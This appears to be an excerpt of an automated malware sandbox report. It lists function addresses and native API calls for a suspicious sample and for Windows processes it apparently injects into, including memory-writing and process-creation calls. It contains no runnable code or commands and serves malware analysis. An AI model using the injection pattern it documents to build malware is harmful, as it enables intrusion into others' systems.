Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_02EE2D10
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE35C0 NtCreateMutant,LdrInitializeThunk,	7_2_02EE35C0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE39B0 NtGetContextThread,LdrInitializeThunk,	7_2_02EE39B0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2AB0 NtWaitForSingleObject,	7_2_02EE2AB0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2B80 NtQueryInformationFile,	7_2_02EE2B80
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2EA0 NtAdjustPrivilegesToken,	7_2_02EE2EA0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2E30 NtWriteVirtualMemory,	7_2_02EE2E30
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2FA0 NtQuerySection,	7_2_02EE2FA0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2F90 NtProtectVirtualMemory,	7_2_02EE2F90
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2F60 NtCreateProcessEx,	7_2_02EE2F60
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2CF0 NtOpenProcess,	7_2_02EE2CF0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2CC0 NtQueryVirtualMemory,	7_2_02EE2CC0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2C00 NtQueryInformationProcess,	7_2_02EE2C00
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2DB0 NtEnumerateKey,	7_2_02EE2DB0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2D00 NtSetInformationFile,	7_2_02EE2D00
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE3090 NtSetValueKey,	7_2_02EE3090
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE3010 NtOpenDirectoryObject,	7_2_02EE3010
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE3D70 NtOpenThread,	7_2_02EE3D70
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE3D10 NtOpenProcessToken,	7_2_02EE3D10
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_00518BE0 NtCreateFile,	7_2_00518BE0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_00518D40 NtReadFile,	7_2_00518D40
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_00518E30 NtDeleteFile,	7_2_00518E30
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_00518ED0 NtClose,	7_2_00518ED0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_00519020 NtAllocateVirtualMemory,	7_2_00519020

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

Code function: 0_2_0853DCA0 CreateProcessAsUserW,

0_2_0853DCA0

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_02BF72B0	0_2_02BF72B0
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_02BF4028	0_2_02BF4028
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_02BF3A10	0_2_02BF3A10
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_02BFAA50	0_2_02BFAA50
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_04D618D0	0_2_04D618D0
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_04D62350	0_2_04D62350
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_064E7598	0_2_064E7598
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_064E2E08	0_2_064E2E08
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_064E15C8	0_2_064E15C8
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07EE8770	0_2_07EE8770
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07EE0040	0_2_07EE0040
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07EE8761	0_2_07EE8761
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07EE4000	0_2_07EE4000
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07EE4010	0_2_07EE4010
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F5DBF2	0_2_07F5DBF2
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F5A7A0	0_2_07F5A7A0
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F5CB5A	0_2_07F5CB5A
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F566A8	0_2_07F566A8
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F5F08A	0_2_07F5F08A
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F5E810	0_2_07F5E810
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F5E7F6	0_2_07F5E7F6
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F55680	0_2_07F55680
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F5562D	0_2_07F5562D
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08530040	0_2_08530040
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08536CE0	0_2_08536CE0
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08538518	0_2_08538518
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_0853BDF8	0_2_0853BDF8
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_085335A8	0_2_085335A8
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08530E01	0_2_08530E01
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_0853E368	0_2_0853E368
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08538F06	0_2_08538F06
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_0853AC00	0_2_0853AC00
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08533400	0_2_08533400
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08530006	0_2_08530006
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08536CD1	0_2_08536CD1
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08537CF8	0_2_08537CF8
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08532898	0_2_08532898
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_085328A8	0_2_085328A8
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_085340A8	0_2_085340A8
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08537550	0_2_08537550
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08534158	0_2_08534158
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08533178	0_2_08533178
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_0853C560	0_2_0853C560
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08538509	0_2_08538509
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_085319C0	0_2_085319C0
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08531DC8	0_2_08531DC8
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_0853359A	0_2_0853359A
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08533188	0_2_08533188
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08531DB8	0_2_08531DB8
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08532F50	0_2_08532F50
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08532F40	0_2_08532F40
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_085333F0	0_2_085333F0
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08532B98	0_2_08532B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_004180C3	3_2_004180C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0040F953	3_2_0040F953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_004011B0	3_2_004011B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_004162CF	3_2_004162CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_004162D3	3_2_004162D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_004022AC	3_2_004022AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_004022B0	3_2_004022B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_00404367	3_2_00404367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0040FB73	3_2_0040FB73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0040DB79	3_2_0040DB79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0040DB83	3_2_0040DB83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_00401C20	3_2_00401C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0040DCCC	3_2_0040DCCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0040DCD3	3_2_0040DCD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0040DD9D	3_2_0040DD9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0042E653	3_2_0042E653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_004026D0	3_2_004026D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_00402F30	3_2_00402F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A141A2	3_2_01A141A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A201AA	3_2_01A201AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A181CC	3_2_01A181CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FA118	3_2_019FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01950100	3_2_01950100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E8158	3_2_019E8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F2000	3_2_019F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A203E6	3_2_01A203E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0196E3F0	3_2_0196E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1A352	3_2_01A1A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E02C0	3_2_019E02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00274	3_2_01A00274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A20591	3_2_01A20591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01960535	3_2_01960535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A0E4F6	3_2_01A0E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A04420	3_2_01A04420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A12446	3_2_01A12446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195C7C0	3_2_0195C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01984750	3_2_01984750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01960770	3_2_01960770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197C6E0	3_2_0197C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A2A9A6	3_2_01A2A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019629A0	3_2_019629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01976962	3_2_01976962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019468B8	3_2_019468B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0198E8F0	3_2_0198E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01962840	3_2_01962840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0196A840	3_2_0196A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A16BD7	3_2_01A16BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1AB40	3_2_01A1AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195EA80	3_2_0195EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01978DBF	3_2_01978DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195ADE0	3_2_0195ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FCD1F	3_2_019FCD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0196AD00	3_2_0196AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A00CB5	3_2_01A00CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01950CF2	3_2_01950CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01960C00	3_2_01960C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019DEFA0	3_2_019DEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01952FC8	3_2_01952FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A02F30	3_2_01A02F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01980F30	3_2_01980F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019A2F28	3_2_019A2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D4F40	3_2_019D4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01972E90	3_2_01972E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1CE93	3_2_01A1CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1EEDB	3_2_01A1EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1EE26	3_2_01A1EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01960E59	3_2_01960E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0196B1B0	3_2_0196B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A2B16B	3_2_01A2B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194F172	3_2_0194F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0199516C	3_2_0199516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1F0E0	3_2_01A1F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A170E9	3_2_01A170E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019670C0	3_2_019670C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A0F0CC	3_2_01A0F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019A739A	3_2_019A739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1132D	3_2_01A1132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194D34C	3_2_0194D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019652A0	3_2_019652A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A012ED	3_2_01A012ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197B2C0	3_2_0197B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197D2F0	3_2_0197D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FD5B0	3_2_019FD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A295C3	3_2_01A295C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A17571	3_2_01A17571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1F43F	3_2_01A1F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01951460	3_2_01951460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1F7B0	3_2_01A1F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A116CC	3_2_01A116CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019A5630	3_2_019A5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F5910	3_2_019F5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01969950	3_2_01969950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197B950	3_2_0197B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019638E0	3_2_019638E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CD800	3_2_019CD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197FB80	3_2_0197FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0199DBF9	3_2_0199DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D5BF0	3_2_019D5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1FB76	3_2_01A1FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A01AA3	3_2_01A01AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FDAAC	3_2_019FDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019A5AA0	3_2_019A5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A0DAC6	3_2_01A0DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A17A46	3_2_01A17A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1FA49	3_2_01A1FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D3A6C	3_2_019D3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197FDC0	3_2_0197FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A17D73	3_2_01A17D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01963D40	3_2_01963D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A11D5A	3_2_01A11D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1FCF2	3_2_01A1FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D9C32	3_2_019D9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01961F92	3_2_01961F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1FFB1	3_2_01A1FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A1FF09	3_2_01A1FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01969EB0	3_2_01969EB0
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_0461B0FF	6_2_0461B0FF
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_0463BC1D	6_2_0463BC1D
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_0461CF1D	6_2_0461CF1D
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_04623899	6_2_04623899
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_0462389D	6_2_0462389D
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_0461B143	6_2_0461B143
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_0461B14D	6_2_0461B14D
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_0461D13D	6_2_0461D13D
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_0461B296	6_2_0461B296
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_0461B29D	6_2_0461B29D
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_0461B367	6_2_0461B367
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F302C0	7_2_02F302C0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F50274	7_2_02F50274
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F703E6	7_2_02F703E6
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EBE3F0	7_2_02EBE3F0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6A352	7_2_02F6A352
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F42000	7_2_02F42000
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F681CC	7_2_02F681CC
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F641A2	7_2_02F641A2
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F701AA	7_2_02F701AA
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F38158	7_2_02F38158
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EA0100	7_2_02EA0100
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F4A118	7_2_02F4A118
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02ECC6E0	7_2_02ECC6E0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EAC7C0	7_2_02EAC7C0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB0770	7_2_02EB0770
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02ED4750	7_2_02ED4750
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F5E4F6	7_2_02F5E4F6
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F62446	7_2_02F62446
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F54420	7_2_02F54420
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F70591	7_2_02F70591
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB0535	7_2_02EB0535
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EAEA80	7_2_02EAEA80
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F66BD7	7_2_02F66BD7
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6AB40	7_2_02F6AB40
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EDE8F0	7_2_02EDE8F0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02E968B8	7_2_02E968B8
